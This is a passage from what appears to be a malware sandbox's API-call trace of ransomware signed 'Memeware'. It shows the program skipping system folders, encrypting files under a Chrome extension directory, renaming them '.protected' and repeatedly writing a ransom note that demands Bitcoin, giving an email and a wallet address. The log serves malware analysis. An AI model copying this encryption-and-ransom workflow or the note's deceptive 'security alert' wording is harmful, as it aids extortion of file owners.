out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.543] CloseHandle (hObject=0x164) returned 1 [0081.543] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.543] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0081.543] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0081.543] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0081.543] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0081.543] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0081.543] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr") returned 141 [0081.543] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0081.543] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0081.543] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\*") returned 143 [0081.543] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.544] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.544] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.544] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.544] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.544] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.544] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\.") returned 143 [0081.544] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.544] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.544] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.544] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.544] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.544] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.544] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.544] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\..") returned 144 [0081.544] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.544] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.544] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.544] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.544] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.544] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.544] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.544] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.544] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json") 
returned 155 [0081.544] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.544] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.544] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.544] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.545] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json") returned 155 [0081.545] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.545] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json") returned 155 [0081.545] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.545] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json") returned 155 [0081.545] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.545] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0081.545] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.545] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0081.545] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.546] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.546] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.546] CloseHandle (hObject=0x168) returned 1 [0081.546] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.protected") returned 165 [0081.546] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.protected")) returned 1 [0081.546] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.546] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.546] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\RESTORE_FILES.txt") returned 159 [0081.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.547] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.547] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.547] lstrlenA (lpString="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") returned 684 [0081.548] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.548] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.548] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.548] CloseHandle (hObject=0x164) returned 1 [0081.548] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.548] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0081.548] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0081.548] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0081.548] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0081.548] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0081.548] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk") returned 141 [0081.548] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0081.548] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0081.548] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\*") returned 143 [0081.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.548] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.548] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.548] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.548] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.548] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.548] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\.") returned 143 [0081.548] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.548] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.548] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.548] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.548] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.548] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.548] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.548] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\..") returned 144 [0081.548] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.548] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.549] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.549] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.549] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.549] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.549] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.549] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.549] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json") 
returned 155 [0081.549] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.549] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.549] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.549] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json") returned 155 [0081.549] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json") returned 155 [0081.549] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json") returned 155 [0081.549] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.549] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x130, lpOverlapped=0x0) returned 1 [0081.550] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffed0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.550] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x130, lpOverlapped=0x0) returned 1 [0081.550] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.550] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.550] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.550] CloseHandle (hObject=0x168) returned 1 [0081.550] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.protected") returned 165 [0081.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.protected")) returned 1 [0081.551] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.551] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.551] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\RESTORE_FILES.txt") returned 159 [0081.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.551] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.551] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.552] lstrlenA (lpString="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") returned 684 [0081.552] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.552] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.552] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.552] CloseHandle (hObject=0x164) returned 1 [0081.552] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.552] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0081.552] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0081.552] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0081.552] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0081.552] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0081.552] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi") returned 141 [0081.552] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0081.552] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0081.552] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\*") returned 143 [0081.552] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.552] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.552] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.553] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.553] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.553] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.553] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
